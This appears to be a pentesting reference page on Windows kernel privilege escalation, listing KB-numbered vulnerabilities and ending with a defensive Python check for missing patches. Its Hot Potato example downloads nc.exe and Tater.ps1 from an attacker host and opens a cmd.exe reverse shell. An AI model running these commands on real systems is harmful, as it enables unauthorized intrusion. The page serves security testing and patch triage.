Kernel Exploitation
Last updated
Run exploit suggester against systeminfo:
$ python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
Find installed patches (hotfix IDs and install dates):
$ wmic qfe get Caption,Description,HotFixID,InstalledOn
List of kernel exploits:
#Security Bulletin  #KB  #Description  #Operating System
[KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (Windows 7/8)
[LNK Remote Code Execution Vulnerability]  (Windows 10/8.1/7/2016/2010/2008)
[Windows COM Elevation of Privilege Vulnerability]  (Windows 10/8.1/7/2016/2010/2008)
[SMBv3 Null Pointer Dereference Denial of Service]  (Windows 8.1/Server 2012 R2)
[Win32k Elevation of Privilege Vulnerability]  (Windows 7 SP1/2008 SP2/2008 R2 SP1)
[KB4013389]  [Windows Kernel Mode Drivers]  (Windows 7/2008/2003/XP)
[KB3199135]  [Windows Kernel Mode Drivers]  (2016)
[KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
[KB3178466]  [Kernel Driver]  (Win 8.1)
[KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
Example of Hot Potato exploitation
Attacker:
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
Victim:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1', '.\Tater.ps1')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"
To cross-compile a Windows program from Kali, use the following command:
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
[KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
[KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
[KB3136041]  [WebDAV]  (2008/Vista/7)
[KB3134228]  [remote code execution]  (2008/Vista/7) ...
[KB823980]   [Buffer Overrun In RPC Interface]  (NT/2000/XP/2003)
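As an added example (not part of the original page or of windows-exploit-suggester), the following Python check parses the `systeminfo` or `wmic qfe` output produced by the commands above and reports which of the KBs in this list are absent from a host, giving a defender a quick triage list of kernel patches to verify. The systeminfo text is constructed sample data, and the RCE entry is taken as KB3134228.

```python
import re

# KB identifiers from the kernel exploit list on this page, mapped to the
# short description given there. Sample mapping assembled from the list above.
PAGE_KBS = {
    "KB4013081": "GDI Palette Objects Local Privilege Escalation",
    "KB4013389": "Windows Kernel Mode Drivers",
    "KB3199135": "Windows Kernel Mode Drivers (2016)",
    "KB3186973": "kernel api",
    "KB3178466": "Kernel Driver",
    "KB3164038": "Hot Potato",
    "KB3143145": "Kernel Driver",
    "KB3143141": "Secondary Logon Handle",
    "KB3136041": "WebDAV",
    "KB3134228": "remote code execution",
    "KB823980": "Buffer Overrun In RPC Interface",
}

# Both `systeminfo` ("[01]: KB4013081") and `wmic qfe` (HotFixID column)
# print hotfix IDs as KB followed by six or seven digits.
KB_RE = re.compile(r"\bKB\d{6,7}\b")


def installed_kbs(report_text):
    """Collect every KB id that appears in a systeminfo or wmic qfe report."""
    return set(KB_RE.findall(report_text))


def missing_kbs(report_text, wanted=PAGE_KBS):
    """Return the page's KBs not present in the report, sorted.

    Caveat: a KB that only ships for another OS version, or that has been
    superseded by a later rollup, also shows up here, so treat the result
    as a list to verify against the host's OS and update history.
    """
    have = installed_kbs(report_text)
    return sorted(kb for kb in wanted if kb not in have)


# Constructed sample of the relevant part of `systeminfo` output.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows 7 Professional
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4013081
                           [02]: KB3143141
                           [03]: KB976902
"""

if __name__ == "__main__":
    for kb in missing_kbs(SAMPLE_SYSTEMINFO):
        print(f"{kb} not installed: {PAGE_KBS[kb]}")
```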